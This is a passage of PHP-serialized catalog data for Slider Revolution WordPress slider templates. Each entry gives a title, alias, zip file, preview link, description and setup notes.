CallToAction\";s:5:\"alias\";s:27:\"websitebuilder-calltoaction\";s:3:\"zip\";s:37:\"packs/websitebuilder-calltoaction.zip\";s:3:\"uid\";s:32:\"45851baf9e61f55ed9f5fa9d0beff77e\";s:3:\"img\";s:38:\"websitebuilder-calltoaction/slide1.jpg\";s:7:\"preview\";s:60:\"https://revolution.themepunch.com/wordpress-website-builder/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:7:\"5.2.5.3\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"960\";s:11:\"description\";s:157:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:15:\"Website Builder\";s:13:\"package_order\";s:1:\"6\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"3\";s:9:\"installed\";b:0;}i:94;a:25:{s:2:\"id\";s:2:\"96\";s:5:\"title\";s:22:\"Website Builder Footer\";s:5:\"alias\";s:21:\"websitebuilder-footer\";s:3:\"zip\";s:31:\"packs/websitebuilder-footer.zip\";s:3:\"uid\";s:32:\"2732bbe66ef28219d6cc53ce8cc78863\";s:3:\"img\";s:32:\"websitebuilder-footer/slide1.jpg\";s:7:\"preview\";s:60:\"https://revolution.themepunch.com/wordpress-website-builder/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:7:\"5.2.5.3\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"600\";s:11:\"description\";s:157:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:15:\"Website Builder\";s:13:\"package_order\";s:1:\"7\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"3\";s:9:\"installed\";b:0;}i:95;a:22:{s:2:\"id\";s:2:\"97\";s:5:\"title\";s:21:\"Focus Parallax Effect\";s:5:\"alias\";s:13:\"focusparallax\";s:3:\"zip\";s:17:\"focusparallax.zip\";s:3:\"uid\";s:32:\"13bd15fb3ddf8b9841cb55b89389cc73\";s:3:\"img\";s:24:\"focusparallax/slide1.jpg\";s:7:\"preview\";s:68:\" https://revolution.themepunch.com/parallax-effect-wordpress-plugin/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:7:\"5.2.5.3\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"900\";s:11:\"description\";s:256:\"<span class=\"ttm_content\">A full-screen slider with mouse controlled parallax effects. <a href=\"https://www.themepunch.com/revslider-doc/layer-settings/#layeractions\">\"Layer Actions\"</a> are used for links on layers.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:415:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Edit the slides to change images and texts.<br/>Some content is in <a href=\"https://www.themepunch.com/slider-revolution/global-layers/\" target=\"_blank\">\"Static / Global Layers\"</a><br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:96;a:22:{s:2:\"id\";s:2:\"98\";s:5:\"title\";s:14:\"Duotone Slider\";s:5:\"alias\";s:7:\"duotone\";s:3:\"zip\";s:11:\"duotone.zip\";s:3:\"uid\";s:32:\"494862ceb6cb7c6658ad7cd36848cccd\";s:3:\"img\";s:18:\"duotone/slide1.jpg\";s:7:\"preview\";s:64:\"https://revolution.themepunch.com/wordpress-header-image-slider/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:7:\"5.2.5.4\";s:5:\"width\";s:4:\"1200\";s:6:\"height\";s:3:\"800\";s:11:\"description\";s:252:\"<span class=\"ttm_content\">A full-screen slider with unique parallax scroll effect. <a href=\"https://www.themepunch.com/revslider-doc/layer-settings/#layeractions\">\"Layer Actions\"</a> are used for links on layers.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:277:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Edit the slides to change images and texts.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:97;a:25:{s:2:\"id\";s:2:\"99\";s:5:\"title\";s:12:\"Minimal Menu\";s:5:\"alias\";s:6:\"r_menu\";s:3:\"zip\";s:16:\"packs/r_menu.zip\";s:3:\"uid\";s:32:\"30d6a6895db1a5f29b1679061551c9f0\";s:3:\"img\";s:17:\"r_menu/slide1.jpg\";s:7:\"preview\";s:59:\"https://revolution.themepunch.com/minimal-website-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"5.2.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"110\";s:11:\"description\";s:157:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:890:\"<span class=\"ttm_content\">\r\nIn the <a href=\"https://https://www.themepunch.com/slider-revolution/custom-css-javascript/\" target=\"_blank\">Custom JavaScript</a> section of the \"Minimal Menu\" Template you can scroll down to the color change section.<br/>\r\nFor any elements you want to background color change in addition to the sites body, add this class to the <a href=\"https://www.themepunch.com/revslider-doc/layer-attributes/\" target=\"_blank\">Layers Attributes</a> \".tp-colorchange\".<br/><br/>\r\nIf you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:24:\"Minimal Website Template\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"4\";s:9:\"installed\";b:0;}i:98;a:25:{s:2:\"id\";s:3:\"100\";s:5:\"title\";s:12:\"Minimal Hero\";s:5:\"alias\";s:5:\"rhero\";s:3:\"zip\";s:16:\"packs/r_hero.zip\";s:3:\"uid\";s:32:\"b8b46186956f6e66ad0c08e4532bbbde\";s:3:\"img\";s:17:\"r_hero/slide1.jpg\";s:7:\"preview\";s:59:\"https://revolution.themepunch.com/minimal-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.2.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"700\";s:11:\"description\";s:157:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:890:\"<span class=\"ttm_content\">\r\nIn the <a href=\"https://https://www.themepunch.com/slider-revolution/custom-css-javascript/\" target=\"_blank\">Custom JavaScript</a> section of the \"Minimal Menu\" Template you can scroll down to the color change section.<br/>\r\nFor any elements you want to background color change in addition to the sites body, add this class to the <a href=\"https://www.themepunch.com/revslider-doc/layer-attributes/\" target=\"_blank\">Layers Attributes</a> \".tp-colorchange\".<br/><br/>\r\nIf you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:24:\"Minimal Website Template\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"4\";s:9:\"installed\";b:0;}i:99;a:25:{s:2:\"id\";s:3:\"101\";s:5:\"title\";s:13:\"Minimal About\";s:5:\"alias\";s:7:\"r_about\";s:3:\"zip\";s:17:\"packs/r_about.zip\";s:3:\"uid\";s:32:\"343010c4b4c03f92888c3e9e95bc2bb1\";s:3:\"img\";s:18:\"r_about/slide1.jpg\";s:7:\"preview\";s:59:\"https://revolution.themepunch.com/minimal-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.2.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"900\";s:11:\"description\";s:157:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:890:\"<span class=\"ttm_content\">\r\nIn the <a href=\"https://https://www.themepunch.com/slider-revolution/custom-css-javascript/\" target=\"_blank\">Custom JavaScript</a> section of the \"Minimal Menu\" Template you can scroll down to the color change section.<br/>\r\nFor any elements you want to background color change in addition to the sites body, add this class to the <a href=\"https://www.themepunch.com/revslider-doc/layer-attributes/\" target=\"_blank\">Layers Attributes</a> \".tp-colorchange\".<br/><br/>\r\nIf you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:24:\"Minimal Website Template\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"4\";s:9:\"installed\";b:0;}i:100;a:25:{s:2:\"id\";s:3:\"102\";s:5:\"title\";s:16:\"Minimal Products\";s:5:\"alias\";s:10:\"r_products\";s:3:\"zip\";s:20:\"packs/r_products.zip\";s:3:\"uid\";s:32:\"dda93e85c6a4456d132040147f087f39\";s:3:\"img\";s:21:\"r_products/slide1.jpg\";s:7:\"preview\";s:59:\"https://revolution.themepunch.com/minimal-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.2.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:4:\"1100\";s:11:\"description\";s:157:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:890:\"<span class=\"ttm_content\">\r\nIn the <a href=\"https://https://www.themepunch.com/slider-revolution/custom-css-javascript/\" target=\"_blank\">Custom JavaScript</a> section of the \"Minimal Menu\" Template you can scroll down to the color change section.<br/>\r\nFor any elements you want to background color change in addition to the sites body, add this class to the <a href=\"https://www.themepunch.com/revslider-doc/layer-attributes/\" target=\"_blank\">Layers Attributes</a> \".tp-colorchange\".<br/><br/>\r\nIf you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:24:\"Minimal Website Template\";s:13:\"package_order\";s:1:\"3\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"4\";s:9:\"installed\";b:0;}i:101;a:25:{s:2:\"id\";s:3:\"103\";s:5:\"title\";s:12:\"Minimal Info\";s:5:\"alias\";s:6:\"r_info\";s:3:\"zip\";s:16:\"packs/r_info.zip\";s:3:\"uid\";s:32:\"d6e368e8fd4862174af6c980389ae530\";s:3:\"img\";s:17:\"r_info/slide1.jpg\";s:7:\"preview\";s:59:\"https://revolution.themepunch.com/minimal-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.2.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"800\";s:11:\"description\";s:157:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:890:\"<span class=\"ttm_content\">\r\nIn the <a href=\"https://https://www.themepunch.com/slider-revolution/custom-css-javascript/\" target=\"_blank\">Custom JavaScript</a> section of the \"Minimal Menu\" Template you can scroll down to the color change section.<br/>\r\nFor any elements you want to background color change in addition to the sites body, add this class to the <a href=\"https://www.themepunch.com/revslider-doc/layer-attributes/\" target=\"_blank\">Layers Attributes</a> \".tp-colorchange\".<br/><br/>\r\nIf you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:24:\"Minimal Website Template\";s:13:\"package_order\";s:1:\"4\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"4\";s:9:\"installed\";b:0;}i:102;a:22:{s:2:\"id\";s:3:\"104\";s:5:\"title\";s:18:\"Inspiration Header\";s:5:\"alias\";s:17:\"inspirationheader\";s:3:\"zip\";s:21:\"inspirationheader.zip\";s:3:\"uid\";s:32:\"69f04b2be0b618fa7e184af83b86b7e7\";s:3:\"img\";s:28:\"inspirationheader/slide1.jpg\";s:7:\"preview\";s:57:\"https://revolution.themepunch.com/wordpress-theme-header/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.2.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:159:\"<span class=\"ttm_content\">This full-screen hero slider features sequentially animated texts and cool parallax elements.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:300:\"<span class=\"ttm_content\">This is a \"Default\" content hero slider. Just edit the slide to change the background image and texts.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:103;a:22:{s:2:\"id\";s:3:\"105\";s:5:\"title\";s:15:\"Magazine Slider\";s:5:\"alias\";s:13:\"magazineposts\";s:3:\"zip\";s:17:\"magazineposts.zip\";s:3:\"uid\";s:32:\"c562f3457e4edbd030959f7c5e6e0f7c\";s:3:\"img\";s:24:\"magazineposts/slide1.jpg\";s:7:\"preview\";s:60:\"https://revolution.themepunch.com/wordpress-magazine-slider/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"5.2.6\";s:5:\"width\";s:4:\"1400\";s:6:\"height\";s:4:\"1000\";s:11:\"description\";s:266:\"<span class=\"ttm_content\">A full-width slider with a mouse-controlled 3D-Parallax effect. Enjoy! <a href=\"https://www.themepunch.com/revslider-doc/layer-settings/#layeractions\">\"Layer Actions\"</a> are used for links on layers.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:277:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Edit the slides to change images and texts.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:104;a:22:{s:2:\"id\";s:3:\"106\";s:5:\"title\";s:11:\"News Header\";s:5:\"alias\";s:17:\"explorationheader\";s:3:\"zip\";s:21:\"explorationheader.zip\";s:3:\"uid\";s:32:\"8f20d5a868c90ded08b835fb9e8307d7\";s:3:\"img\";s:28:\"explorationheader/slide1.jpg\";s:7:\"preview\";s:56:\"https://revolution.themepunch.com/wordpress-news-header/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"5.2.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:288:\"<span class=\"ttm_content\">A full-screen slider that is a perfect fit for displaying news on your websites header! Check out <a href=\"https://www.themepunch.com/revslider-doc/layer-settings/#layeractions\">\"Layer Actions\"</a> to add links to buttons.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:277:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Edit the slides to change images and texts.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:105;a:25:{s:2:\"id\";s:3:\"107\";s:5:\"title\";s:23:\"Minimal Website Package\";s:5:\"alias\";s:23:\"minimal-website-package\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:23:\"minimal-website-package\";s:3:\"img\";s:31:\"packages/template_group_1_1.jpg\";s:7:\"preview\";s:59:\"https://revolution.themepunch.com/minimal-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.2.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"110\";s:11:\"description\";s:181:\"<span class=\"ttm_content\">The Minimal Website Template is a one-pager website with a unique background color change effect on scrolling down.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:890:\"<span class=\"ttm_content\">\r\nIn the <a href=\"https://https://www.themepunch.com/slider-revolution/custom-css-javascript/\" target=\"_blank\">Custom JavaScript</a> section of the \"Minimal Menu\" Template you can scroll down to the color change section.<br/>\r\nFor any elements you want to background color change in addition to the sites body, add this class to the <a href=\"https://www.themepunch.com/revslider-doc/layer-attributes/\" target=\"_blank\">Layers Attributes</a> \".tp-colorchange\".<br/><br/>\r\nIf you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:24:\"Minimal Website Template\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"4\";s:9:\"installed\";b:0;}i:106;a:25:{s:2:\"id\";s:3:\"108\";s:5:\"title\";s:23:\"Website Builder Package\";s:5:\"alias\";s:22:\"websitebuilder-package\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:22:\"websitebuilder-package\";s:3:\"img\";s:29:\"packages/template_group_2.jpg\";s:7:\"preview\";s:60:\"https://revolution.themepunch.com/wordpress-website-builder/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:7:\"5.2.5.3\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:2:\"60\";s:11:\"description\";s:191:\"<span class=\"ttm_content\">The Website Builder Package is a clean, usable collection website modules that can be used all together or each on their own.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:15:\"Website Builder\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"3\";s:9:\"installed\";b:0;}i:107;a:25:{s:2:\"id\";s:3:\"109\";s:5:\"title\";s:26:\"Dark Content Block Package\";s:5:\"alias\";s:27:\"dark-fullsite-block-package\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:27:\"dark-fullsite-block-package\";s:3:\"img\";s:29:\"packages/template_group_4.jpg\";s:7:\"preview\";s:64:\"https://revolution.themepunch.com/dark-wordpress-parallax-theme/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.2.5\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:158:\"<span class=\"ttm_content\">This Minimal Website Template has some sleek parallax effects and on-demand loading modules.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:13:\"Fullsite Dark\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"2\";s:9:\"installed\";b:0;}i:108;a:25:{s:2:\"id\";s:3:\"110\";s:5:\"title\";s:27:\"Light Content Block Package\";s:5:\"alias\";s:22:\"fullsite-block-package\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:22:\"fullsite-block-package\";s:3:\"img\";s:29:\"packages/template_group_3.jpg\";s:7:\"preview\";s:59:\"https://revolution.themepunch.com/wordpress-parallax-theme/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.2.5\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:158:\"<span class=\"ttm_content\">This Minimal Website Template has some sleek parallax effects and on-demand loading modules.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:8:\"Fullsite\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"1\";s:9:\"installed\";b:0;}i:109;a:22:{s:2:\"id\";s:3:\"111\";s:5:\"title\";s:17:\"Typewriter Effect\";s:5:\"alias\";s:16:\"typewritereffect\";s:3:\"zip\";s:20:\"typewritereffect.zip\";s:3:\"uid\";s:32:\"d6f8bae06cc4a7b158d680c01e59ddc2\";s:3:\"img\";s:27:\"typewritereffect/slide1.jpg\";s:7:\"preview\";s:62:\"https://revolution.themepunch.com/wordpress-typewriter-effect/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.3.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:263:\"<span class=\"ttm_content\">This is the example slider from the Typewriter add-on preview.<br/><a href=\"https://www.themepunch.com/revslider-doc/layer-settings/#layeractions\">\"Layer Actions\"</a> are used for links on buttons.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:403:\"<span class=\"ttm_content\">This slider template requires the <a href=\"https://www.themepunch.com/slider-revolution/typewriter-addon/\" target=\"_blank\">Typewriter add-on</a> to be installed. Edit the slides to change images and texts.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";s:173:\"[{\"path\":\"revslider-typewriter-addon\\/revslider-typewriter-addon.php\",\"name\":\"Typewriter AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/typewriter-addon\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:110;a:22:{s:2:\"id\";s:3:\"112\";s:5:\"title\";s:17:\"Blend Mode 